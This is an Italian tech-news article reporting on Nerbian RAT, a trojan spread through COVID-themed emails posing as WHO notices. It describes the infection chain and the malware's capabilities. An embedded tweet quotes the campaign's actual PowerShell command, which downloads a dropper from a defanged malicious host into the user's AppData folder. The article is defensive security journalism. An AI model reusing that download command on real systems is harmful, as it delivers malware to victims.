image/svg+xml
Logo Tom's Hardware
  • Hardware
  • Videogiochi
  • Mobile
  • Elettronica
  • EV
  • Scienze
  • B2B
  • Quiz
  • Tom's Hardware Logo
  • Hardware
  • Videogiochi
  • Mobile
  • Elettronica
  • EV
  • Scienze
  • B2B
  • Quiz
  • Forum
  • Sconti & Coupon
Sconti & Coupon
Accedi a Xenforo
Immagine di LTSC è la versione più pulita di Windows! Tua a 8€ per un tempo limitato LTSC è la versione più pulita di Windows! Tua a 8€ per u...
Immagine di Incredibile ma vero: PNG si aggiorna dopo ben 22 anni Incredibile ma vero: PNG si aggiorna dopo ben 22 anni...

Un nuovo malware RAT sfrutta il COVID tramite campagne malspam

Scoperto un trojan che sfrutta una campagna malspam che simula comunicazioni ufficiali dell'OMS sul COVID-19.

Advertisement

Quando acquisti tramite i link sul nostro sito, potremmo guadagnare una commissione di affiliazione. Scopri di più
Avatar di Marco Doria

a cura di Marco Doria

Pubblicato il 13/05/2022 alle 11:00

È stato scoperto un nuovo Remote Access Trojan (RAT) che sfrutta l'argomento COVID-19 per diffondersi tramite campagne malspam. Il trojan è noto come Nerbian RAT ed è stato scoperto dai ricercatori di Proofpoint. Il malware sfrutta le immagini dell'Organizzazione Mondiale della Sanità (OMS) per ingannare le vittime, e presenta delle sconcertanti capacità di elusione delle analisi.

Programmato nel linguaggio Go e compilato per i sistemi a 64 bit, Nerbian è un grado di installarsi su varie piattaforme, mentre le campagne per la sua diffusione hanno riguardato diversi settori.

Any ideas? - #WHO - #COVID19 themed lure

powershell IWR -Uri https://www.fernandestechnical.]com/pub/media/gitlog -OutFile C:\Users\Admin\AppData\Roaming\UpdateUAV.exehttps://t.co/cQf1KK6UEt pic.twitter.com/bAbXJRM0ti

— proxylife (@pr0xylife) April 28, 2022
Questo contenuto è ospitato su una piattaforma esterna. Per visualizzarlo, è necessario accettare i cookie

Le e-mail inviate alle vittime contenevano un file di Word dannoso, a volte compresso in un archivio RAR: le macro contenute nel documento, una volta attivate, presentavano informazioni sulla sicurezza in caso di COVID-19, con misure da adottare l'auto-isolamento dei soggetti infetti. Il documento, però, esegue tramite file bat una PowerShell che a sua volta scarica un dropper Goland a 64 bit, denominato "UpdateUAV.exe". Il file scarica il RAT Nerbian e presenta un codice "cannibalizzato" da alcuni progetti GitHub.

Le funzioni supportate da Nerbian RAT includono un keylogger e uno strumento di acquisizione dello schermo, nonché un sistema di gestione delle comunicazioni tramite SSL. L'utente proxylife su Twitter ha segnalato il malware, che prende il nome da Don Chisciotte presentando il percorso del file e le immagini connesse all'OMS. La campagna ha avuto un volume molto ridotto, secondo i ricercatori di Proofpoint, ed è partita il 26 aprile 2022 colpendo diversi soggetti dislocati in Italia, Spagna e Regno Unito.

Nei periodi di estrema incertezza, come quelle che stiamo vivendo adesso, tra il proseguire della pandemia e il conflitto russo-ucraino, aumentano i tentativi di diffusione di malspam e altri malware come il ransomware, per questo motivo, consigliamo sempre ai nostri lettori di prestare particolare attenzione alle mail e ai messaggi sospetti, di tenere aggiornati i propri antivirus e assicurarsi di utilizzare password uniche e complesse, magari con l'aiuto di un password manager.

Fonte dell'articolo: securityaffairs.co

Leggi altri articoli

👋 Partecipa alla discussione! Scopri le ultime novità che abbiamo riservato per te!

0 Commenti

⚠️ Stai commentando come Ospite . Vuoi accedere?


Questa funzionalità è attualmente in beta, se trovi qualche errore segnalacelo.

Segui questa discussione
Advertisement

Non perdere gli ultimi aggiornamenti

Newsletter Telegram

I più letti di oggi


  • #1
    7 smart TV da tenere d'occhio in vista del Prime Day
  • #2
    Blocco diesel Euro 5 Nord Italia: tutto quello che c'è da sapere
  • #3
    Amazon Prime Day, quand'è, quanto dura e come trovare le offerte migliori
  • #4
    Incredibile ma vero: PNG si aggiorna dopo ben 22 anni
  • #5
    LTSC è la versione più pulita di Windows! Tua a 8€ per un tempo limitato
  • #6
    Migliori stampanti fotografiche (luglio 2025)
Articolo 1 di 5
Incredibile ma vero: PNG si aggiorna dopo ben 22 anni
Rivoluzione PNG: dopo 22 anni arriva il supporto HDR, animazioni e metadati Exif nel nuovo formato che cambierà il web e la fotografia digitale.
Immagine di Incredibile ma vero: PNG si aggiorna dopo ben 22 anni
4
Leggi questo articolo
Articolo 2 di 5
LTSC è la versione più pulita di Windows! Tua a 8€ per un tempo limitato
Se avete bisogno di stabilità e affidabilità a lungo termine, con un ciclo di vita di supporto esteso, allora non perdetevi questa super offerta su Windows 11 LTSC
Immagine di LTSC è la versione più pulita di Windows! Tua a 8€ per un tempo limitato
Leggi questo articolo
Articolo 3 di 5
Lenovo ThinkPad X9 14 Aura Edition: la rivoluzione dei ThinkPad | Test & Recensione
Un ThinkPad che rompe con la tradizione: design in alluminio, display OLED e intelligenza artificiale in un corpo ultrasottile e raffinato.
Immagine di Lenovo ThinkPad X9 14 Aura Edition: la rivoluzione dei ThinkPad | Test & Recensione
Leggi questo articolo
Articolo 4 di 5
400 milioni di PC Windows in meno in 3 anni: che fine hanno fatto? [Aggiornata]
I nuovi dati forniti da Microsoft mostrano un calo importante dei PC Windows negli ultimi anni. Gli utenti si sono spostati su altri sistemi operativi?
Immagine di 400 milioni di PC Windows in meno in 3 anni: che fine hanno fatto? [Aggiornata]
1
Leggi questo articolo
Articolo 5 di 5
Dite addio alle vecchie GTX 1000, presto saranno abbandonate
È ora di dire addio a una generazione storica: NVIDIA termina il supporto per le GPU GTX 700, 900 e 1000, a partire dai driver 580.
Immagine di Dite addio alle vecchie GTX 1000, presto saranno abbandonate
11
Leggi questo articolo
Advertisement
Advertisement

Advertisement

Footer
Tom's Hardware Logo

 
Contatti
  • Contattaci
  • Feed RSS
Legale
  • Chi siamo
  • Privacy
  • Cookie
  • Affiliazione Commerciale
Altri link
  • Forum
Il Network 3Labs Network Logo
  • Tom's Hardware
  • SpazioGames
  • CulturaPop
  • Data4Biz
  • TechRadar
  • SosHomeGarden
  • Aibay

Tom's Hardware - Testata giornalistica associata all'USPI Unione Stampa Periodica Italiana, registrata presso il Tribunale di Milano, nr. 285 del 9/9/2013 - Direttore: Andrea Ferrario

3LABS S.R.L. • Via Pietro Paleocapa 1 - Milano (MI) 20121
CF/P.IVA: 04146420965 - REA: MI - 1729249 - Capitale Sociale: 10.000 euro

© 2025 3Labs Srl. Tutti i diritti riservati.